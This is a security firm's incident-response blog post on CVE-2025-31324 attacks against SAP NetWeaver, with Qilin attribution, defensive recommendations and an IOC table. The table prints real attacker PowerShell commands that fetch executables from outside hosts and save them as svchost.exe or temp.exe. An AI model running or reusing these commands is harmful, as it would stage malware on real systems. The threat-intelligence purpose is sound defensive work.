CVE-2025-31324 hit the security world like a tsunami – an easily exploitable SAP vulnerability affecting enterprise environments across the globe. But while most assumed its exploitation began post-disclosure, new evidence suggests otherwise.
During an incident response led by OP Innovate for a major global enterprise, we uncovered proof that this vulnerability was actively exploited nearly three weeks before it was made public. While recent articles point the finger towards China-Linked APTs, we identified communication with known Cobalt Strike C2 infrastructure and IP addresses linked directly to Qilin, a notorious Russian-speaking Ransomware-as-a-Service group.
What started as a routine post-disclosure investigation quickly evolved into a rare glimpse of zero-day exploitation in the wild – and possibly, early access to a vulnerability that hadn’t yet made headlines.
In this blog, we’ll walk you through:
- How the attack unfolded weeks before disclosure
- What we found during forensic analysis
- Why we believe this ties into broader Qilin ransomware operations
- What defenders can learn from this breach to prepare for future threats exploiting enterprise middleware like SAP
- What organizations using SAP should do to stay safe
CVE-2025-31324: Simple Exploit, Serious Impact
CVE-2025-31324 is a critical vulnerability affecting SAP NetWeaver Visual Composer, a component commonly deployed in large enterprise environments. The flaw lies in the /developmentserver/metadatauploader endpoint, which fails to properly enforce authentication and authorization. This allows an unauthenticated attacker to upload arbitrary files, including web shells, to the server, with ease.
SAP assigned this a CVSS score of 10.0, reflecting its trivial exploitation path and severe impact, including the potential for remote code execution and full system compromise.
What makes this vulnerability especially dangerous is its accessibility:
- No authentication required
- Attack surface exposed via standard HTTP(S)
- Commonly deployed in enterprise SAP environments
By the time SAP released an emergency patch and CISA added it to the KEV catalog, exploitation was underway – and, as we discovered, not just after the disclosure.
As a byproduct of the incident response, OP Innovate developed and deployed a dedicated WASP scanner to detect insecure deserialization vulnerabilities like CVE-2025-31324. This scanner is currently operational and actively scanning for affected SAP NetWeaver components.
Inside the Breach: From Minus-One to Zero
OP Innovate’s investigation revealed two separate exploitations of CVE-2025-31324 within a major enterprise environment. The first occurred nearly three weeks before the vulnerability was publicly disclosed. The second happened shortly after the CVE was published. Although both incidents relied on the same unauthenticated file upload flaw in SAP NetWeaver, the threat infrastructure and observed behavior varied significantly.
During the investigation, our team identified a publicly available Proof of Concept (POC) exploit for CVE-2025-31324 hosted on GitHub. The POC specifically targeted the vulnerable /developmentserver/metadatauploader endpoint and demonstrated how to upload arbitrary .jsp files, without authentication. This code closely matched the method used in the attack, helping us validate the exploitation chain and confirm that the threat actor leveraged this exact vulnerability in the wild.
Pre-Disclosure Exploitation
Initial Access:
Weeks before CVE-2025-31324 appeared in public advisories, an attacker exploited the vulnerable Metadata Uploader endpoint within SAP NetWeaver. The most probable access vector was a misconfigured load balancer that exposed internal services to the internet.
The attacker uploaded several JSP-based webshells to the SAP IRJ directory:
\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\
Webshells like random12.jsp, xxkmszdm.jsp, and gpfmddkh.jsp were automatically compiled and enabled full remote code execution.
Once in, the attacker attempted to:
- Initiate outbound communication with Cobalt Strike C2 infrastructure (180[.]131[.]145[.]73, 184[.]174[.]96[.]74)
- Download and stage a payload (rs64c.exe) from http[:]//184[.]174[.]96[.]74/rs64c.exe, a reverse SOCKS5 tunneling tool
- Save the payload locally as svchost.exe and prepare for execution
What We Saw:
The attacker’s use of IP address 184[.]174[.]96[.]74 and the tool rs64c.exe closely matches infrastructure and tools previously associated with Qilin, a Russian-speaking Ransomware-as-a-Service (RaaS) group. This indicates the activity was likely part of an initial access attempt, potentially intended to prepare the ground for a future ransomware attack or to sell access to other threat actors.
What Failed:
- The Firewall blocked outbound C2 traffic
- The EDR quarantined all downloaded payloads
- Neither lateral movement nor persistence mechanisms were observed
- The attacker attempted to clean up artifacts by issuing Remove-Item commands for files like random12.jsp and ESC.exe, but the files had already been quarantined by EDR, rendering the cleanup ineffective.
Post-Disclosure Exploitation
Initial Access:
Shortly after CVE-2025-31324 was disclosed publicly, a second exploitation attempt was observed. The attacker again leveraged the same SAP endpoint to upload webshells. However, there is no evidence linking this activity to the pre-disclosure attacker, as no overlapping infrastructure or tools were observed.
What the Attacker Did:
New webshells – such as ran_new.jsp, bdtzvjzm.jsp, and decoxfiv.jsp – were deployed, followed by attempts to download executables via PowerShell:
- https://bashupload.com/bSLrt/test.exe → temp.exe
- https://bashupload.com/HUbaF/test.exe → temp_new.exe
What Failed:
- All download attempts were blocked or quarantined
- No execution, lateral movement, nor communication with external infrastructure occurred
- Deployed files were manually removed, likely by the attacker
Outcome
In both incidents, the attacker successfully gained initial access and remote code execution by exploiting CVE-2025-31324. However, post-exploitation efforts failed completely in both cases:
- No payloads were executed
- No data was exfiltrated
- No movement beyond the SAP servers occurred
Defensive controls – including network-layer blocking and endpoint containment – prevented what may have been a planned ransomware delivery. The pre-disclosure incident bore the hallmarks of Qilin-linked infrastructure, while the post-disclosure event remains unattributed but similarly neutralized.
The Qilin Connection: Exploiting SAP, Staging for Ransomware
The pre-disclosure activity observed in this incident shows clear overlap with tactics and infrastructure linked to Qilin, a Russian-speaking Ransomware-as-a-Service (RaaS) group active since 2022. Qilin operates through an affiliate model, frequently leveraging Initial Access Brokers (IABs), commodity tooling, and staged infrastructure to prepare environments for high-impact ransomware deployment.
Qilin’s Tactics
According to public threat intelligence from multiple sources, Qilin affiliates typically follow a consistent operational pattern:
- Initial access via exposed web applications or phishing
- Deployment of tunneling utilities or frameworks like Cobalt Strike
- Network scoping, privilege escalation, and lateral movement
- Delayed ransomware deployment and data extortion
This incident mirrors several elements of that playbook – including unauthenticated access via a known (or yet to be known) CVE, staging of remote access tools, and outbound communication with known infrastructure.
Supporting Evidence from Official Intelligence
Prior to public awareness of this specific intrusion, Indonesia’s National Cyber and Crypto Agency (BSSN) published an official IOC bulletin – IOC_QILIN Ransomware v1.3, dated April 15, 2025 – listing infrastructure indicators linked to Qilin ransomware activity. This bulletin included:
- IP address: 184[.]174[.]96[.]70
- File path: C:\ProgramData\rs64c.exe
- IP address: 180[.]131[.]145[.]73
Each of these indicators corresponds closely with evidence from this incident:
- The attacker downloaded the tunneling tool rs64c.exe from http[:]//184[.]174[.]96[.]74/rs64c.exe — an IP in the same 184[.]174[.]96[.]0/24 subnet as the Qilin-linked IP 184[.]174[.]96[.]70
- The binary was written to the exact same path listed in the bulletin: C:\ProgramData\rs64c.exe
- The attacker attempted to reach 180[.]131[.]145[.]73, which is explicitly listed in the BSSN bulletin as Qilin infrastructure
These direct overlaps – including exact file paths and IP matches – support a high-confidence assessment that the infrastructure leveraged in this incident aligns with known Qilin operations.
Use of Cobalt Strike
Cobalt Strike remains a standard tool in post-exploitation phases of many RaaS operations, including Qilin. Its modular, red-team-oriented architecture makes it ideal for maintaining persistence, conducting reconnaissance, and staging ransomware payloads. While beacon sessions were blocked in this case, the attacker’s preparation and infrastructure use were consistent with a pre-ransomware staging phase typical of Qilin affiliates.
Recommendations
Based on the observed tactics and mitigated actions during the incident, the following recommendations are aimed at reducing exposure to similar threat activity and improving organizational resilience against exploitation and ransomware staging:
- Patch and Restrict Exposure of SAP NetWeaver Systems
- Immediately apply the vendor patch addressing CVE-2025-31324 on all affected SAP NetWeaver instances.
- Implement strict network segmentation to ensure SAP interfaces are not publicly accessible unless absolutely necessary.
- Review reverse proxy/load balancer configurations (e.g., F5) to avoid accidental exposure of internal endpoints.
- Web Application Hardening
- Enable web application firewalls (WAFs) or filtering controls that block unauthorized file uploads and exploit attempts.
- Regularly audit for the presence of custom endpoints (like /metadatauploader) that may bypass authentication or input validation.
- Endpoint and Malware Defense
- Maintain EDR coverage on all internet-facing and business-critical systems. Ensure automatic quarantine is enabled and up-to-date detection signatures are deployed.
- Block execution from temporary paths such as C:\ProgramData\ and other commonly abused directories via group policy or EDR rules.
- Prevent execution of unsigned or suspicious binaries downloaded via PowerShell or other scripting interfaces.
- Network Controls and C2 Disruption
- Enforce egress filtering on firewall and proxy layers to block outbound connections to untrusted IPs and domains.
- Block traffic to known Cobalt Strike and reverse proxy tools (e.g., rs64c.exe) using threat intelligence feeds (e.g., ThreatFox, AbuseIPDB).
- Monitor for unusual outbound communication to rare external IPs, particularly from servers not expected to initiate such traffic.
- PowerShell Monitoring and Restrictions
- Enable PowerShell Script Block Logging and Constrained Language Mode on servers.
- Alert on suspicious PowerShell activity, especially:
- Invoke-WebRequest or wget
- Downloading to uncommon paths
- Use of Remove-Item for cleanup
- Incident Readiness and Response
- Review and test incident response plans, especially for pre-ransomware detection.
- Ensure your SOC and IR teams are trained to identify early-stage intrusion activity, even before payload delivery (e.g., C2 staging, tunneling tools).
- Establish a process to cross-reference alerts with public IOCs, such as those shared in bulletins like BSSN IOC_QILIN v1.3.
- Threat Intelligence Integration
- Subscribe to and regularly review government and vendor-published IOC feeds.
- Integrate IOC correlation into SIEM and SOAR workflows, ensuring real-time blocking or escalation on high-fidelity matches.
Unique Indicators of Compromise (IOCs)
IOC Type | IOC | Hash type | Description | Notes |
File Hash | D1C43F8DB230BDF18C61D672440EBA12 | MD5 | Old executable test.exe | Downloaded to: C:\ProgramData\temp.exe Download URL: https://bashupload.com/bSLrt/test.exe |
File Hash | 6914B1F5B6843341FAFDFAA9D57818B9 | MD5 | New executable test.exe (same filename, different hash and URL) | Downloaded to: C:\ProgramData\temp_new.exe Download URL: https://bashupload.com/HUbaF/test.exe |
IP Address | http[:]//184[.]174[.]96[.]70 | Known Qilin IOC; used as command-and-control or payload host. | ||
IP Address | http[:]//184[.]174[.]96[.]74 | Staging IP used to host rs64c.exe reverse tunneler. | ||
IP Address | 180[.]131[.]145[.]73 | Command-and-control IP associated with Qilin; pinged from target system. | ||
URL | http[:]//184[.]174[.]96[.]70/rs64c.exe | Download URL for reverse SOCKS5 tunneler (IOC-listed host). | ||
URL | http[:]//184[.]174[.]96[.]74/rs64c.exe | Download URL for reverse SOCKS5 tunneler (IOC-listed host). | ||
Command Line | powershell.exe /c invoke-webrequest http://184.174.96.74/rs64c.exe -OutFile c:\programdata\svchost.exe | PowerShell command used to download rs64c.exe to a writable directory. | ||
Command Line | powershell Invoke-WebRequest -Uri https://bashupload.com/bSLrt/test.exe -OutFile C:\ProgramData\temp.exe | Command used to download a malicious executable via Bashupload service. | ||
Command Line | PowerShell Remove-Item | Cleanup command to remove dropped files such as ESC.exe and random12.jsp. | Used to delete ESC.exe and random12.jsp | |
Path | “\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root\” | SAP webroot path used by attacker to upload malicious JSP files. | Used for uploading malicious JSP files | |
Directory | \Device\HarddiskVolume12\usr\sap\PP1\J01\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\ | Directory where JSPs were auto-compiled to .class files — evidence of exploitation. | SAP class file pathLocation where JSP files were compiled to .class – Prove exploitation by creating classes | |
File Names | random12.jsp, duchyofn.jsp, rbekqaun.jsp, rwlrqhrj.jsp, xxkmszdm.jsp, gpfmddkh.jsp, bdtzvjzm.jsp, decoxfiv.jsp, zdulvrqu.jsp, ran_new.jsp | Automatically compiled by the SAP server, generating corresponding .class files inside the \irj\work\ folder | Random 8-char names for stealth.Randomized JSP WebshellUploaded to SAP root path | |
File Names | “JEE_jsp_bdtzvjzm_1743883325986.class” | Auto-compiled JSP class file resulting from uploaded webshell. | ||
File Names | “test.exe” | Malicious executable downloaded from Bashupload and staged in ProgramData. | Dropped in SAP root path | |
File Names | “ESC.exe” | Malicious binary dropped via webshell, later deleted via PowerShell. | Dropped in SAP root path |
Protect Your Systems with OP Innovate
As cyber threats grow more sophisticated, organizations need trusted partners who can deliver both proactive defense and rapid response. OP Innovate helps businesses stay secure by combining immediate incident response services with advanced vulnerability detection.
Our dedicated WASP scanner continuously monitors SAP environments for critical weaknesses like insecure deserialization flaws, including CVE-2025-31324, helping organizations fix issues before attackers can exploit them. In parallel, our Incident Response (IR) teams are ready to rapidly contain and investigate any breach, minimizing disruption and restoring security.
We share regular threat intelligence updates and security insights. Sign up to receive our latest updates straight to your inbox: